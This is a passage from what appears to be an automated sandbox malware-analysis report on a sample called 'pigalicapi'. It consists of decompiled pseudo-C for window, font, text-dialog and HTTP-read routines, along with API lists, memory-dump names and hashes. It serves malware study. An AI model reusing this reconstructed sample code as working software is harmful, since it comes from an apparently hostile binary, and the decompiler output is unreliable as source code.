                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 04002D4B
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002DC8
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002DD2
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002DDA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • gzip, xrefs: 04002D3F
                                                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 04002B32
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                                          • Opcode ID: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                                          • Instruction ID: 59e70dbda308a2a2546c0d296605ce979221f8659c43edef85f985c08622dbb4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B91FC75904218ABEB65CF94CC48BEAB7B5BB48304F50819DE609BB280DB796E84CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00810880(intOrPtr __ecx, void* __edx, void* __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				struct tagLOGFONTA _v84;
                                                                                                                                                                                                                                                                                          				char _v140;
                                                                                                                                                                                                                                                                                          				void _v144;
                                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                                          				intOrPtr _v156;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                                          				signed int _t64;
                                                                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                                                                          				int _t67;
                                                                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr _t80;
                                                                                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                                                                                          				intOrPtr _t89;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				intOrPtr _t103;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t104;
                                                                                                                                                                                                                                                                                          				signed int _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t105 = __esi;
                                                                                                                                                                                                                                                                                          				_t97 = __edx;
                                                                                                                                                                                                                                                                                          				_t51 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t51 ^ _t106;
                                                                                                                                                                                                                                                                                          				_t103 = __ecx;
                                                                                                                                                                                                                                                                                          				_t80 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                                                                                                                                          				_v156 = __ecx;
                                                                                                                                                                                                                                                                                          				if(( *(_t80 + 8) & 0x00000800) == 0) {
                                                                                                                                                                                                                                                                                          					_t104 = GetWindowDC(0);
                                                                                                                                                                                                                                                                                          					_v148 = 0;
                                                                                                                                                                                                                                                                                          					if(( *(_t80 + 0xc) & 0x00001000) == 0) {
                                                                                                                                                                                                                                                                                          						_t55 =  *(__esi + 0xa4);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v84.lfHeight = 0;
                                                                                                                                                                                                                                                                                          						E00816820( &(_v84.lfWidth), 0, 0x38);
                                                                                                                                                                                                                                                                                          						_t107 = _t107 + 0xc;
                                                                                                                                                                                                                                                                                          						GetObjectA( *(__esi + 0xa4), 0x3c,  &_v84);
                                                                                                                                                                                                                                                                                          						_v84.lfWeight = _v84.lfWeight + 0xc8;
                                                                                                                                                                                                                                                                                          						_t55 = CreateFontIndirectA( &_v84);
                                                                                                                                                                                                                                                                                          						_v148 = _t55;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v152 = SelectObject(_t104, _t55);
                                                                                                                                                                                                                                                                                          					_v24.left = 0;
                                                                                                                                                                                                                                                                                          					_v24.top = 0;
                                                                                                                                                                                                                                                                                          					_v24.right = 0;
                                                                                                                                                                                                                                                                                          					_v24.bottom = 0;
                                                                                                                                                                                                                                                                                          					DrawTextA(_t104,  *(_t80 + 4), 0xffffffff,  &_v24, 0x424);
                                                                                                                                                                                                                                                                                          					_t82 = _v24.right - _v24.left;
                                                                                                                                                                                                                                                                                          					SelectObject(_t104, _v152);
                                                                                                                                                                                                                                                                                          					_v144 = 0;
                                                                                                                                                                                                                                                                                          					E00816820( &_v140, 0, 0x38);
                                                                                                                                                                                                                                                                                          					GetObjectA( *(_t105 + 0xa4), 0x3c,  &_v144);
                                                                                                                                                                                                                                                                                          					_t64 = _v144;
                                                                                                                                                                                                                                                                                          					if(_t64 < 0) {
                                                                                                                                                                                                                                                                                          						_t64 =  ~_t64;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t89 =  *((intOrPtr*)(_t105 + 0x9c));
                                                                                                                                                                                                                                                                                          					_t65 = _t64 + 8;
                                                                                                                                                                                                                                                                                          					if(_t65 <= _t89) {
                                                                                                                                                                                                                                                                                          						_t65 = _t89;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v156 + 0x10)) = _t65;
                                                                                                                                                                                                                                                                                          					_t46 =  *((intOrPtr*)(_t105 + 0xb0)) +  *(_t105 + 0x98) * 2 + 5; // 0xeb102474
                                                                                                                                                                                                                                                                                          					_t67 = GetSystemMetrics(0x47);
                                                                                                                                                                                                                                                                                          					_t101 = _v156;
                                                                                                                                                                                                                                                                                          					_t68 = _v148;
                                                                                                                                                                                                                                                                                          					_t85 = _t82 + _t46 - _t67 + 1;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v156 + 0xc)) = _t82 + _t46 - _t67 + 1;
                                                                                                                                                                                                                                                                                          					if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          						DeleteObject(_t68);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E008159E6(ReleaseDC(0, _t104), _t85, _v8 ^ _t106, _t101, _t104, _t105);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t76 = GetSystemMetrics(0xf);
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					 *(_t103 + 0x10) = _t76 - _t97 >> 1;
                                                                                                                                                                                                                                                                                          					 *(_t103 + 0xc) = 0;
                                                                                                                                                                                                                                                                                          					return E008159E6(_t76 - _t97 >> 1, _t80, _v8 ^ _t106, _t97, _t103, __esi);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                                          0x00810880
                                                                                                                                                                                                                                                                                          0x00810880
                                                                                                                                                                                                                                                                                          0x00810889
                                                                                                                                                                                                                                                                                          0x00810890
                                                                                                                                                                                                                                                                                          0x00810895
                                                                                                                                                                                                                                                                                          0x00810897
                                                                                                                                                                                                                                                                                          0x008108a1
                                                                                                                                                                                                                                                                                          0x008108a7
                                                                                                                                                                                                                                                                                          0x008108d8
                                                                                                                                                                                                                                                                                          0x008108e3
                                                                                                                                                                                                                                                                                          0x008108e9
                                                                                                                                                                                                                                                                                          0x00810929
                                                                                                                                                                                                                                                                                          0x008108eb
                                                                                                                                                                                                                                                                                          0x008108ee
                                                                                                                                                                                                                                                                                          0x008108f5
                                                                                                                                                                                                                                                                                          0x00810900
                                                                                                                                                                                                                                                                                          0x0081090a
                                                                                                                                                                                                                                                                                          0x00810910
                                                                                                                                                                                                                                                                                          0x0081091b
                                                                                                                                                                                                                                                                                          0x00810921
                                                                                                                                                                                                                                                                                          0x00810921
                                                                                                                                                                                                                                                                                          0x00810945
                                                                                                                                                                                                                                                                                          0x0081094f
                                                                                                                                                                                                                                                                                          0x00810952
                                                                                                                                                                                                                                                                                          0x00810955
                                                                                                                                                                                                                                                                                          0x00810958
                                                                                                                                                                                                                                                                                          0x0081095b
                                                                                                                                                                                                                                                                                          0x0081096a
                                                                                                                                                                                                                                                                                          0x0081096f
                                                                                                                                                                                                                                                                                          0x00810980
                                                                                                                                                                                                                                                                                          0x0081098a
                                                                                                                                                                                                                                                                                          0x008109a2
                                                                                                                                                                                                                                                                                          0x008109a8
                                                                                                                                                                                                                                                                                          0x008109b0
                                                                                                                                                                                                                                                                                          0x008109b2
                                                                                                                                                                                                                                                                                          0x008109b2
                                                                                                                                                                                                                                                                                          0x008109b4
                                                                                                                                                                                                                                                                                          0x008109ba
                                                                                                                                                                                                                                                                                          0x008109bf
                                                                                                                                                                                                                                                                                          0x008109c1
                                                                                                                                                                                                                                                                                          0x008109c1
                                                                                                                                                                                                                                                                                          0x008109c9
                                                                                                                                                                                                                                                                                          0x008109dd
                                                                                                                                                                                                                                                                                          0x008109e1
                                                                                                                                                                                                                                                                                          0x008109e7
                                                                                                                                                                                                                                                                                          0x008109ef
                                                                                                                                                                                                                                                                                          0x008109f5
                                                                                                                                                                                                                                                                                          0x008109f6
                                                                                                                                                                                                                                                                                          0x008109fb
                                                                                                                                                                                                                                                                                          0x008109fe
                                                                                                                                                                                                                                                                                          0x008109fe
                                                                                                                                                                                                                                                                                          0x00810a1c
                                                                                                                                                                                                                                                                                          0x008108a9
                                                                                                                                                                                                                                                                                          0x008108ab
                                                                                                                                                                                                                                                                                          0x008108b1
                                                                                                                                                                                                                                                                                          0x008108b6
                                                                                                                                                                                                                                                                                          0x008108b9
                                                                                                                                                                                                                                                                                          0x008108cf
                                                                                                                                                                                                                                                                                          0x008108cf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 008108AB
                                                                                                                                                                                                                                                                                          • GetWindowDC.USER32(00000000,?,?), ref: 008108D2
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 008108F5
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 0081090A
                                                                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0081091B
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00810931
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,?,000000FF,0080C567,00000424), ref: 0081095B
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0081096F
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0081098A
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,00000000), ref: 008109A2
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 008109E1
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 008109FE
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00810A07
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Object$MetricsSelectSystem_memset$CreateDeleteDrawFontIndirectReleaseTextWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2607864528-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e0aef9483e7dc31c6579b558712335d584baa9ce0fda77e2a54f1ceda9815248
                                                                                                                                                                                                                                                                                          • Instruction ID: a77289980426dc71a20719890ce71119193a59db1069fb539f2229f769240fa9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0aef9483e7dc31c6579b558712335d584baa9ce0fda77e2a54f1ceda9815248
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71410B70A00209DFDB60DFA8DC85FAAB7B8FF44304F108559E549D7282DB709A45CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                                                                                          			E0080C9B0(CHAR* __eax, signed int __ecx, CHAR* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                                          				CHAR* _t12;
                                                                                                                                                                                                                                                                                          				int _t17;
                                                                                                                                                                                                                                                                                          				int _t20;
                                                                                                                                                                                                                                                                                          				CHAR* _t23;
                                                                                                                                                                                                                                                                                          				CHAR* _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                          				CHAR* _t39;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t12 = __eax;
                                                                                                                                                                                                                                                                                          				_t30 = _a4;
                                                                                                                                                                                                                                                                                          				 *(_t30 + 0x30) =  *(_t30 + 0x30) | __ecx;
                                                                                                                                                                                                                                                                                          				_t35 = __edx;
                                                                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                                                                          					_t12 = GetActiveWindow();
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *(_t30 + 0x28) = _t12;
                                                                                                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          					_t25 = _t30 + 0x4c;
                                                                                                                                                                                                                                                                                          					if(_t25 != 0) {
                                                                                                                                                                                                                                                                                          						if(lstrlenA(_t35) <= 0x7f) {
                                                                                                                                                                                                                                                                                          							_t20 = lstrlenA(_t35);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t20 = 0x7f;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t12 = lstrcpynA(_t25, _t35, _t20 + 1);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t23 = _a12;
                                                                                                                                                                                                                                                                                          				if(_t23 != 0) {
                                                                                                                                                                                                                                                                                          					_t39 = _t30 + 0xcc;
                                                                                                                                                                                                                                                                                          					if(_t39 != 0) {
                                                                                                                                                                                                                                                                                          						if(lstrlenA(_t23) <= 0x7f) {
                                                                                                                                                                                                                                                                                          							_t17 = lstrlenA(_t23);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t17 = 0x7f;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t12 = lstrcpynA(_t39, _t23, _t17 + 1);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t36 = _t30 + 8;
                                                                                                                                                                                                                                                                                          				if(_t36 == 0) {
                                                                                                                                                                                                                                                                                          					RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					return _t12;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t36 = _t30;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t36 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(0x880c68);
                                                                                                                                                                                                                                                                                          					_t28 =  *0x880c80; // 0x0
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t36 + 8)) = _t28;
                                                                                                                                                                                                                                                                                          					 *0x880c80 = _t36;
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x880c68);
                                                                                                                                                                                                                                                                                          					_push(_t30 + 0x24);
                                                                                                                                                                                                                                                                                          					if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          						return ReplaceTextA(??);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return FindTextA();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x0080c9b0
                                                                                                                                                                                                                                                                                          0x0080c9b5
                                                                                                                                                                                                                                                                                          0x0080c9b8
                                                                                                                                                                                                                                                                                          0x0080c9bb
                                                                                                                                                                                                                                                                                          0x0080c9bf
                                                                                                                                                                                                                                                                                          0x0080c9c1
                                                                                                                                                                                                                                                                                          0x0080c9c1
                                                                                                                                                                                                                                                                                          0x0080c9c7
                                                                                                                                                                                                                                                                                          0x0080c9cd
                                                                                                                                                                                                                                                                                          0x0080c9cf
                                                                                                                                                                                                                                                                                          0x0080c9d4
                                                                                                                                                                                                                                                                                          0x0080c9e0
                                                                                                                                                                                                                                                                                          0x0080c9ea
                                                                                                                                                                                                                                                                                          0x0080c9e2
                                                                                                                                                                                                                                                                                          0x0080c9e2
                                                                                                                                                                                                                                                                                          0x0080c9e2
                                                                                                                                                                                                                                                                                          0x0080c9f4
                                                                                                                                                                                                                                                                                          0x0080c9f4
                                                                                                                                                                                                                                                                                          0x0080c9d4
                                                                                                                                                                                                                                                                                          0x0080c9fa
                                                                                                                                                                                                                                                                                          0x0080c9ff
                                                                                                                                                                                                                                                                                          0x0080ca01
                                                                                                                                                                                                                                                                                          0x0080ca09
                                                                                                                                                                                                                                                                                          0x0080ca15
                                                                                                                                                                                                                                                                                          0x0080ca1f
                                                                                                                                                                                                                                                                                          0x0080ca17
                                                                                                                                                                                                                                                                                          0x0080ca17
                                                                                                                                                                                                                                                                                          0x0080ca17
                                                                                                                                                                                                                                                                                          0x0080ca29
                                                                                                                                                                                                                                                                                          0x0080ca29
                                                                                                                                                                                                                                                                                          0x0080ca09
                                                                                                                                                                                                                                                                                          0x0080ca2f
                                                                                                                                                                                                                                                                                          0x0080ca35
                                                                                                                                                                                                                                                                                          0x0080ca94
                                                                                                                                                                                                                                                                                          0x0080ca9a
                                                                                                                                                                                                                                                                                          0x0080ca9b
                                                                                                                                                                                                                                                                                          0x0080ca9c
                                                                                                                                                                                                                                                                                          0x0080ca9d
                                                                                                                                                                                                                                                                                          0x0080ca9e
                                                                                                                                                                                                                                                                                          0x0080ca9f
                                                                                                                                                                                                                                                                                          0x0080caa0
                                                                                                                                                                                                                                                                                          0x0080ca37
                                                                                                                                                                                                                                                                                          0x0080ca37
                                                                                                                                                                                                                                                                                          0x0080ca44
                                                                                                                                                                                                                                                                                          0x0080ca47
                                                                                                                                                                                                                                                                                          0x0080ca4d
                                                                                                                                                                                                                                                                                          0x0080ca53
                                                                                                                                                                                                                                                                                          0x0080ca5b
                                                                                                                                                                                                                                                                                          0x0080ca61
                                                                                                                                                                                                                                                                                          0x0080ca6e
                                                                                                                                                                                                                                                                                          0x0080ca6f
                                                                                                                                                                                                                                                                                          0x0080ca86
                                                                                                                                                                                                                                                                                          0x0080ca71
                                                                                                                                                                                                                                                                                          0x0080ca7a
                                                                                                                                                                                                                                                                                          0x0080ca7a
                                                                                                                                                                                                                                                                                          0x0080ca6f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 0080C9C1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,?,00000000,?,008071AB,00000000,?,?), ref: 0080C9D7
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,008071AB,00000000,?,?), ref: 0080C9EA
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,008071AB,00000000,?,?), ref: 0080C9F4
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(008071AB,00000000,?,00000000,?,008071AB,00000000,?,?), ref: 0080CA0C
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(008071AB,?,008071AB,00000000,?,?), ref: 0080CA1F
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,008071AB,00000001,?,008071AB,00000000,?,?), ref: 0080CA29
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0080CA39
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00880C68,?,008071AB,00000000,?,?), ref: 0080CA47
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00880C68,?,008071AB,00000000,?,?), ref: 0080CA61
                                                                                                                                                                                                                                                                                          • FindTextA.COMDLG32(?,?,008071AB), ref: 0080CA71
                                                                                                                                                                                                                                                                                          • ReplaceTextA.COMDLG32(?,?,008071AB), ref: 0080CA7D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CriticalSectionTextlstrcpyn$ActiveCurrentEnterFindLeaveReplaceThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2015787953-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2efe2bd6918905f521d74729ec0d93fb827ac96a51f28d5dc094fccb8f34e4e8
                                                                                                                                                                                                                                                                                          • Instruction ID: d864bfd38235c6eba6351e0c2976696bc4edb5e66225f3a3fb2b6809e3a912c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2efe2bd6918905f521d74729ec0d93fb827ac96a51f28d5dc094fccb8f34e4e8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921D671A01729EFD3719FA5EC8CB6E7B68FF14711F108216F906D2251CB34A8029FA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E0080E0A0(void* __esi, int _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                                          				signed char _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				void* _v60;
                                                                                                                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v72;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                          				int _t56;
                                                                                                                                                                                                                                                                                          				signed char _t65;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t97;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t101 = __esi;
                                                                                                                                                                                                                                                                                          				_t48 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t48 ^ _t102;
                                                                                                                                                                                                                                                                                          				_t50 = _a8;
                                                                                                                                                                                                                                                                                          				_v68 = _t50;
                                                                                                                                                                                                                                                                                          				 *_t50 = 0;
                                                                                                                                                                                                                                                                                          				if(IsWindowEnabled( *(__esi + 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					_pop(_t96);
                                                                                                                                                                                                                                                                                          					return E008159E6(0, 0, _v8 ^ _t102, _t91, _t96, _t101);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t97 =  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          					_v72 = _t97;
                                                                                                                                                                                                                                                                                          					if(GetFocus() != _t97) {
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t56 = _a4;
                                                                                                                                                                                                                                                                                          						_v64 = 0;
                                                                                                                                                                                                                                                                                          						if(_t56 == 0xd) {
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							_v40.left = 0;
                                                                                                                                                                                                                                                                                          							_v40.top = 0;
                                                                                                                                                                                                                                                                                          							_v40.right = 0;
                                                                                                                                                                                                                                                                                          							_v40.bottom = 0;
                                                                                                                                                                                                                                                                                          							GetClientRect( *(_t101 + 4),  &_v40);
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t101 + 4), 0x41d, _v64,  &_v24);
                                                                                                                                                                                                                                                                                          							_t91 =  *(_t101 + 4);
                                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
